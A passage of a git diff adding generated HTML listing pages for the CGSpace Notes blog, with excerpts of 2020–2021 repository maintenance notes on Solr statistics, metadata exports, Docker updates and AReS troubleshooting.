+<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
+<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
+</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
+</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/3/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html
new file mode 100644
index 000000000..b6025d201
--- /dev/null
+++ b/docs/categories/notes/page/3/index.html
@@ -0,0 +1,429 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-11/">November, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-11-02T22:27:07+02:00">Tue Nov 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-11-02">2021-11-02</h2>
+<ul>
+<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
+<li>First I exported all the 2019 stats from CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
+</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-10/">October, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-10-01T11:14:07+03:00">Fri Oct 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-10-01">2021-10-01</h2>
+<ul>
+<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+</span></span><span style="display:flex;"><span>ations-matching.csv
+</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+</span></span><span style="display:flex;"><span>1879
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt 
+</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
+</span></span></code></pre></div><ul>
+<li>So we have 1879/7100 (26.46%) matching already</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-09/">September, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-09-01T09:14:07+03:00">Wed Sep 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-09-02">2021-09-02</h2>
+<ul>
+<li>Troubleshooting the missing Altmetric scores on AReS
+<ul>
+<li>Turns out that I didn&rsquo;t actually fix them last month because the check for <code>content.altmetric</code> still exists, and I can&rsquo;t access the DOIs using <code>_h.source.DOI</code> for some reason</li>
+<li>I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!</li>
+<li>I will change <code>DOI</code> to <code>tomato</code> in the repository setup and start a re-harvest&hellip; I need to see if this is some kind of reserved word or something&hellip;</li>
+<li>Even as <code>tomato</code> I can&rsquo;t access that field as <code>_h.source.tomato</code> in Angular, but it does work as a filter source&hellip; sigh</li>
+</ul>
+</li>
+<li>I&rsquo;m having problems using the OpenRXV API
+<ul>
+<li>The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search query properly&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-08/">August, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-08-01T09:01:07+03:00">Sun Aug 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-08-01">2021-08-01</h2>
+<ul>
+<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+</span></span></code></pre></div><ul>
+<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-07/">July, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-07-01T08:53:07+03:00">Thu Jul 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-07-01">2021-07-01</h2>
+<ul>
+<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 20994
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-06/">June, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-06-01T10:51:07+03:00">Tue Jun 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-06-01">2021-06-01</h2>
+<ul>
+<li>IWMI notified me that AReS was down with an HTTP 502 error
+<ul>
+<li>Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification</li>
+<li>I don&rsquo;t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the <code>angular_nginx</code> container isn&rsquo;t running</li>
+<li>I simply started it and AReS was running again:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-05/">May, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-05-02T09:50:54+03:00">Sun May 02, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-05-01">2021-05-01</h2>
+<ul>
+<li>I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents:
+<ul>
+<li>&ldquo;RI/1.0&rdquo;, 1337</li>
+<li>&ldquo;Microsoft Office Word 2014&rdquo;, 941</li>
+</ul>
+</li>
+<li>I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one&hellip; as that&rsquo;s an actual user&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-04/">April, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-04-01T09:50:54+03:00">Thu Apr 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-04-01">2021-04-01</h2>
+<ul>
+<li>I wrote a script to query Sherpa&rsquo;s API for our ISSNs: <code>sherpa-issn-lookup.py</code>
+<ul>
+<li>I&rsquo;m curious to see how the results compare with the results from Crossref yesterday</li>
+</ul>
+</li>
+<li>AReS Explorer was down since this morning, I didn&rsquo;t see anything in the systemd journal
+<ul>
+<li>I simply took everything down with docker-compose and then back up, and then it was OK</li>
+<li>Perhaps one of the containers crashed, I should have looked closer but I was in a hurry</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-03/">March, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-03-01T10:13:54+02:00">Mon Mar 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-03-01">2021-03-01</h2>
+<ul>
+<li>Discuss some OpenRXV issues with Abdullah from CodeObia
+<ul>
+<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li>
+<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/">CGSpace CG Core v2 Migration</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-21T13:27:35+02:00">Sun Feb 21, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Changes to CGSpace metadata fields to align more with DC, QDC, and DCTERMS as well as CG Core v2. Implemented on 2021-02-21.</p>
+<p>With reference to <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2 draft standard</a> by Marie-Angélique as well as <a href="http://www.dublincore.org/specifications/dublin-core/dcmi-terms/">DCMI DCTERMS</a>.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-cgcorev2-migration/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/2/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/4/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html
new file mode 100644
index 000000000..58bfc6eed
--- /dev/null
+++ b/docs/categories/notes/page/4/index.html
@@ -0,0 +1,449 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-02/">February, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-02-01T10:13:54+02:00">Mon Feb 01, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-02-01">2021-02-01</h2>
+<ul>
+<li>Abenet said that CIP found more duplicate records in their export from AReS
+<ul>
+<li>I re-opened <a href="https://github.com/ilri/OpenRXV/issues/67">the issue</a> on OpenRXV where we had previously noticed this</li>
+<li>The shared link where the duplicates are is here: <a href="https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6">https://cgspace.cgiar.org/explorer/shared/heEOz3YBnXdK69bR2ra6</a></li>
+</ul>
+</li>
+<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100875,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-01/">January, 2021</a></h2>
+    <p class="blog-post-meta"><time datetime="2021-01-03T10:13:54+02:00">Sun Jan 03, 2021</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-01-03">2021-01-03</h2>
+<ul>
+<li>Peter notified me that some filters on AReS were broken again
+<ul>
+<li>It&rsquo;s the same issue with the field names getting <code>.keyword</code> appended to the end that I already <a href="https://github.com/ilri/OpenRXV/issues/66">filed an issue on OpenRXV about last month</a></li>
+<li>I fixed the broken filters (careful to not edit any others, lest they break too!)</li>
+</ul>
+</li>
+<li>Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV
+<ul>
+<li>The start page had been &ldquo;1&rdquo; in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API</li>
+<li>I adjusted it to default to 0 and added a note to the admin screen</li>
+<li>I realized that this issue was actually causing the first page of 100 statistics to be missing&hellip;</li>
+<li>For example, <a href="https://cgspace.cgiar.org/handle/10568/66839">this item</a> has 51 views on CGSpace, but 0 on AReS</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2021-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-12/">December, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-12-01T11:32:54+02:00">Tue Dec 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-12-01">2020-12-01</h2>
+<ul>
+<li>Atmire responded about the issue with duplicate data in our Solr statistics
+<ul>
+<li>They noticed that some records in the statistics-2015 core haven&rsquo;t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven&rsquo;t migrated any of the records yet</li>
+<li>That&rsquo;s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the <code>cua_version</code> field</li>
+<li>I started processing those (about 411,000 records):</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/">CGSpace DSpace 6 Upgrade</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-15T13:27:35+02:00">Sun Nov 15, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/migration/" rel="tag">Migration</a>
+
+</p>
+  </header>
+  <p>Notes about the DSpace 6 upgrade on CGSpace in 2020-11.</p>
+  <a href='https://alanorth.github.io/cgspace-notes/cgspace-dspace6-upgrade/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-11/">November, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-11-01T13:11:54+02:00">Sun Nov 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-11-01">2020-11-01</h2>
+<ul>
+<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+<ul>
+<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-10/">October, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-10-06T16:55:54+03:00">Tue Oct 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-10-06">2020-10-06</h2>
+<ul>
+<li>Add tests for the new <code>/items</code> POST handlers to the DSpace 6.x branch of my <a href="https://github.com/ilri/dspace-statistics-api/tree/v6_x">dspace-statistics-api</a>
+<ul>
+<li>It took a bit of extra work because I had to learn how to mock the responses for when Solr is not available</li>
+<li>Tag and release version 1.3.0 on GitHub: <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0">https://github.com/ilri/dspace-statistics-api/releases/tag/v1.3.0</a></li>
+</ul>
+</li>
+<li>Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump
+<ul>
+<li>During the FlywayDB migration I got an error:</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-09/">September, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-09-02T15:35:54+03:00">Wed Sep 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-09-02">2020-09-02</h2>
+<ul>
